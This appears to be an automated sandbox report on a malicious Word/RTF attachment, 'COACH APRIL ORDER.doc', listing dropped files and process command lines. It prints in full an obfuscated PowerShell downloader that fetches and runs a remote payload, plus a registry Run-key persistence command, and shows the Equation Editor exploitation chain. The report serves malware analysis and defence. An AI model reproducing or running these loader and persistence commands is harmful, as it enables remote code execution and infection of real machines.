IOC Report
COACH APRIL ORDER.doc

loading gif

Files

File Path
Type
Category
Malicious
COACH APRIL ORDER.doc
Rich Text Format data, version 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Transfusionist[1].vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\magicremoihohj75.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BAE8192A-6630-4741-A150-6D87257E3C2A}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{27099B88-2DF0-47DA-B344-2C89EF146D55}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D544EEE9-860F-4EF4-8E01-7FCFBCE4BC5F}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E6255349-99A7-440E-AF85-C8E952BD7749}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\0qftg2pb.31p.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\Cab2DE.tmp
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\Local\Temp\Tar2DF.tmp
data
modified
C:\Users\user\AppData\Local\Temp\bve5hkdf.4i5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ctlc4115.0m1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cu1x2255.20q.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ddomqeod.oea.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\gkt1gi3t.lbv.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ixm51znl.3iw.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jpi14fil.h0z.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\l15pxfut.0ox.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ubbt1fvl.to0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wygvfdy1.g2l.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zillx4l2.uhl.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COACH APRIL ORDER.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu Apr 18 07:20:36 2024, length=335127, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UL67LTYLT60TG6C8RM3.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VW7U4BYAB455RHPEPV6J.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d145b.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\dialogistic.Hed
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\Desktop\~$ACH APRIL ORDER.doc
data
dropped
There are 27 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalfore.iSkoseeGangsnR.vistGlutt ');Dryptrrendes (Thysanoura 'Besrg$ UnbeDUltraiLinj,sKontapKundeeGunwanNarr,s UndraEmbedt colei MaksoKo.uan airs .ivssHonoraFixergSnipp.Paal.HGejsteA dicaGyng.dS iliee.mqurLejevsMasse[rebri$InconE ProtpMissii SmedpBeskuhArgusyGtvrklTsadel,tesk] S,ol=Flor.$ GaleHArga jPapirlParodpSkif,eAlkohv ashiaCombrrRiveri Un,eaA.rodbSpirieLinjelMallesMu kh ');$Weazand=Thysanoura 'BarsvDFuldkiAggras ,odspKinoteMa tin ConcsAar.maFooletChooki Cario.elefnPa zosBrugesStrggaBesidgBegiv.Ne,hrDFlintoIndtewBlaman,nreclAnoukoHar,oaV.scodTraadFHyg.eiR.sullAutomeOp.po(Forse$Dros J arkre adoplEkskolMorakaEgiskbKonve,U,trd$ Ke nDTor.he RavafFasc.l taxaoUntrorChoosa grontBo,hri.armaoAntemnVaseleBainirBenn n,umboeI,dtas U,ch)Paral ';$Weazand=$Intermodillion[1]+$Weazand;$Deflorationernes=$Intermodillion[0];Dryptrrendes (Thysanoura 'inebr$Respig MalilGynanoturnibProteaLegiol Skob:Reto,QNon.uu subjiApokrn GenbiDeuten OperiM pusa Biksz VelaaSyndet skreiSm,shobaandnNonac=Tolun( BrusTN,daneF.tilsLith,t.emie-MinutPNormaa PendtSlegfhLogik Servi$HomesDSelvoeXxivgfDjelllTnkeeo unkmrU,uguaWi,umtAvicuisubtioHundrnWe,rdeVanilrstuddnfalsle KongsMyoma)Compa ');while (!$Quininiazation) {Dryptrrendes (Thysanoura 'Tra,s$MerkagAngurlSoloeoFyrrebDrawsa kovsl unbi:Se,ipISyntarSjaskrNec,se Sowactaranopr cavPeddie LuntrDisheaUntrabDemoplAimykyBegy.=Excre$Ars ntNedefrDe.oyuastroeNowed ') ;Dryptrrendes $Weazand;Dryptrrendes (Thysanoura 'epicaSF,rretknoglata.esrExt.at expo-UmaalSDatovlFelo.eBudcyeClysipunder D rat4 Vafl ');Dryptrrendes (Thysanoura 'Gnomo$Wil agsaarrlMaj.eoHilstbRefreaAbililPrie.:FluorQAflbsuOutspiSubern HairiSerpunSkabiiB indaInd.rzke seaBodywt Thr.i E,bloPromonDelta=Fornr( edniTFroideUdstesArgumtState-DeligPZorriaS.beltMystahFugle ,epe$SveskDJordveOpskrf PhonlAfs.io TallrHjd,paBog et Uviti Han,oBasunnBlgefe uldpr D,snnPriseeBispis tils)Trans ') ;Dryptrrendes (Thysanoura 'Stoch$ Es ig.potrlAfkrfo vrghb CircaNonmalrustr:Rehy,GSatelrSteynuAnethnGibledPassaeMeteosTilba=Volum$Rowd,gViololForuro DionbscripaMacarlA.vok: godvBTouchaTillgrTheosc KnudhOve saLektrnFremmsLider+Spaer+Multi% Ordd$ Ira.OlsefrmP,ppesstropk LunerSociaiVinlav Bedve Bedsn Maand.etroeAutobsmonda. Overc,polooVi.enuEmneanI spit Calo ') ;$Jellab=$Omskrivendes[$Grundes];}Dryptrrendes (Thysanoura ' N ns$DisksgPneuml Perto ebrbSubscaStedmlAfste:KjrulABaitryS,ykkalollatR.lleoRestllMledel Fixiar.llihS.utcsCrook S,ute=Radio AfskrGSproge FribtConfa-ResweCtestio minin,ermet overe.econn ennatAvant Form$MountDOffenePriz.fGoodolPa.tro urtr Strma Perpt Selmi trinoejersn RicieErythrGrylinSyllae atrsB,vge ');Dryptrrendes (Thysanoura ' Beru$.tromg lik lBivero BewabAnsttaTeminlTwang:CerinFVu,gao S.dilOmophk ProgeVirkevIk,ndo lgedgUnpern tevs Formb SwiduOplftsFortrsAnthreUnma.rParalnBlkkeeTri e Bals=Paten Rest[ConsaSWhit y.ortusAborttPo yseFlik.m anne..rdseCSpndsoAuntlnAttenvnesioeGlamorSclert Adul] boue:Tilba:EntusFM csbr ,rbeoKvindmUegenBHoveda olups MeekeGrisk6Nonpl4,ystsSUpk itInarmr.denoiQuadrnoligogtra e(La,en$F,rmoABerriy UnsuaKar.kt GateoSlipslSpionlOverdaSmkk,h Ta bsMinet)Linie ');Dryptrrendes (Thysanoura ' Modu$HumrsgSen.ulBikseoud anbM sliaSidevldisse:D,edeHSouksoBefaml klunkFjor Indiv=Klebi Overd[MeddlSRapuny C stsTimeotFips,eU,sulmRente.viserT BiogeIrr,txBataltDivas.HaverERodomn ModecRetskoDessed Bil iA.ipon subsgIntra]Rling:acidb: BltmAPe,itStemp,Cfine,IS,utbICheck.RanchGUnculeAffortSt,msSTetart LivsrIndkai,rypsnFattigNitte( Mont$ T.ovFMyriaoForhal.npopkuansteAntikv Fo.loB.sesg NondnSensisA sesbFasteukrigssFarfesUndereHornbrGruf nMincieKorse)Kume ');Dryptrrendes (Thysanoura 'Holdk$UnkirgContolGodchoHjlpeb ImdeaOmnivl Unqu:MgtigC TufaoF rprxPrincpHeartoUngelmVildtoCand.nChi oaMakk,eGrusnr egi= Coa,$FljteHTa.zaoi flal,romokEnor .Hostes.taleuHoropb AgglsAfskrtTatovrKeybdiBlde,n rjudgSkrif(Forby2Medi.9 Over2Twe t2Blokd1.rugs4Reg o,Nonco2grsen8W ith5 Medf2Forb.4De,ol) Drgg ');Dryptrrendes $Coxpomonaer;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalfore.iSkoseeGangsnR.vistGlutt ');Dryptrrendes (Thysanoura 'Besrg$ UnbeDUltraiLinj,sKontapKundeeGunwanNarr,s UndraEmbedt colei MaksoKo.uan airs .ivssHonoraFixergSnipp.Paal.HGejsteA dicaGyng.dS iliee.mqurLejevsMasse[rebri$InconE ProtpMissii SmedpBeskuhArgusyGtvrklTsadel,tesk] S,ol=Flor.$ GaleHArga jPapirlParodpSkif,eAlkohv ashiaCombrrRiveri Un,eaA.rodbSpirieLinjelMallesMu kh ');$Weazand=Thysanoura 'BarsvDFuldkiAggras ,odspKinoteMa tin ConcsAar.maFooletChooki Cario.elefnPa zosBrugesStrggaBesidgBegiv.Ne,hrDFlintoIndtewBlaman,nreclAnoukoHar,oaV.scodTraadFHyg.eiR.sullAutomeOp.po(Forse$Dros J arkre adoplEkskolMorakaEgiskbKonve,U,trd$ Ke nDTor.he RavafFasc.l taxaoUntrorChoosa grontBo,hri.armaoAntemnVaseleBainirBenn n,umboeI,dtas U,ch)Paral ';$Weazand=$Intermodillion[1]+$Weazand;$Deflorationernes=$Intermodillion[0];Dryptrrendes (Thysanoura 'inebr$Respig MalilGynanoturnibProteaLegiol Skob:Reto,QNon.uu subjiApokrn GenbiDeuten OperiM pusa Biksz VelaaSyndet skreiSm,shobaandnNonac=Tolun( BrusTN,daneF.tilsLith,t.emie-MinutPNormaa PendtSlegfhLogik Servi$HomesDSelvoeXxivgfDjelllTnkeeo unkmrU,uguaWi,umtAvicuisubtioHundrnWe,rdeVanilrstuddnfalsle KongsMyoma)Compa ');while (!$Quininiazation) {Dryptrrendes (Thysanoura 'Tra,s$MerkagAngurlSoloeoFyrrebDrawsa kovsl unbi:Se,ipISyntarSjaskrNec,se Sowactaranopr cavPeddie LuntrDisheaUntrabDemoplAimykyBegy.=Excre$Ars ntNedefrDe.oyuastroeNowed ') ;Dryptrrendes $Weazand;Dryptrrendes (Thysanoura 'epicaSF,rretknoglata.esrExt.at expo-UmaalSDatovlFelo.eBudcyeClysipunder D rat4 Vafl ');Dryptrrendes (Thysanoura 'Gnomo$Wil agsaarrlMaj.eoHilstbRefreaAbililPrie.:FluorQAflbsuOutspiSubern HairiSerpunSkabiiB indaInd.rzke seaBodywt Thr.i E,bloPromonDelta=Fornr( edniTFroideUdstesArgumtState-DeligPZorriaS.beltMystahFugle ,epe$SveskDJordveOpskrf PhonlAfs.io TallrHjd,paBog et Uviti Han,oBasunnBlgefe uldpr D,snnPriseeBispis tils)Trans ') ;Dryptrrendes (Thysanoura 'Stoch$ Es ig.potrlAfkrfo vrghb CircaNonmalrustr:Rehy,GSatelrSteynuAnethnGibledPassaeMeteosTilba=Volum$Rowd,gViololForuro DionbscripaMacarlA.vok: godvBTouchaTillgrTheosc KnudhOve saLektrnFremmsLider+Spaer+Multi% Ordd$ Ira.OlsefrmP,ppesstropk LunerSociaiVinlav Bedve Bedsn Maand.etroeAutobsmonda. Overc,polooVi.enuEmneanI spit Calo ') ;$Jellab=$Omskrivendes[$Grundes];}Dryptrrendes (Thysanoura ' N ns$DisksgPneuml Perto ebrbSubscaStedmlAfste:KjrulABaitryS,ykkalollatR.lleoRestllMledel Fixiar.llihS.utcsCrook S,ute=Radio AfskrGSproge FribtConfa-ResweCtestio minin,ermet overe.econn ennatAvant Form$MountDOffenePriz.fGoodolPa.tro urtr Strma Perpt Selmi trinoejersn RicieErythrGrylinSyllae atrsB,vge ');Dryptrrendes (Thysanoura ' Beru$.tromg lik lBivero BewabAnsttaTeminlTwang:CerinFVu,gao S.dilOmophk ProgeVirkevIk,ndo lgedgUnpern tevs Formb SwiduOplftsFortrsAnthreUnma.rParalnBlkkeeTri e Bals=Paten Rest[ConsaSWhit y.ortusAborttPo yseFlik.m anne..rdseCSpndsoAuntlnAttenvnesioeGlamorSclert Adul] boue:Tilba:EntusFM csbr ,rbeoKvindmUegenBHoveda olups MeekeGrisk6Nonpl4,ystsSUpk itInarmr.denoiQuadrnoligogtra e(La,en$F,rmoABerriy UnsuaKar.kt GateoSlipslSpionlOverdaSmkk,h Ta bsMinet)Linie ');Dryptrrendes (Thysanoura ' Modu$HumrsgSen.ulBikseoud anbM sliaSidevldisse:D,edeHSouksoBefaml klunkFjor Indiv=Klebi Overd[MeddlSRapuny C stsTimeotFips,eU,sulmRente.viserT BiogeIrr,txBataltDivas.HaverERodomn ModecRetskoDessed Bil iA.ipon subsgIntra]Rling:acidb: BltmAPe,itStemp,Cfine,IS,utbICheck.RanchGUnculeAffortSt,msSTetart LivsrIndkai,rypsnFattigNitte( Mont$ T.ovFMyriaoForhal.npopkuansteAntikv Fo.loB.sesg NondnSensisA sesbFasteukrigssFarfesUndereHornbrGruf nMincieKorse)Kume ');Dryptrrendes (Thysanoura 'Holdk$UnkirgContolGodchoHjlpeb ImdeaOmnivl Unqu:MgtigC TufaoF rprxPrincpHeartoUngelmVildtoCand.nChi oaMakk,eGrusnr egi= Coa,$FljteHTa.zaoi flal,romokEnor .Hostes.taleuHoropb AgglsAfskrtTatovrKeybdiBlde,n rjudgSkrif(Forby2Medi.9 Over2Twe t2Blokd1.rugs4Reg o,Nonco2grsen8W ith5 Medf2Forb.4De,ol) Drgg ');Dryptrrendes $Coxpomonaer;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalfore.iSkoseeGangsnR.vistGlutt ');Dryptrrendes (Thysanoura 'Besrg$ UnbeDUltraiLinj,sKontapKundeeGunwanNarr,s UndraEmbedt colei MaksoKo.uan airs .ivssHonoraFixergSnipp.Paal.HGejsteA dicaGyng.dS iliee.mqurLejevsMasse[rebri$InconE ProtpMissii SmedpBeskuhArgusyGtvrklTsadel,tesk] S,ol=Flor.$ GaleHArga jPapirlParodpSkif,eAlkohv ashiaCombrrRiveri 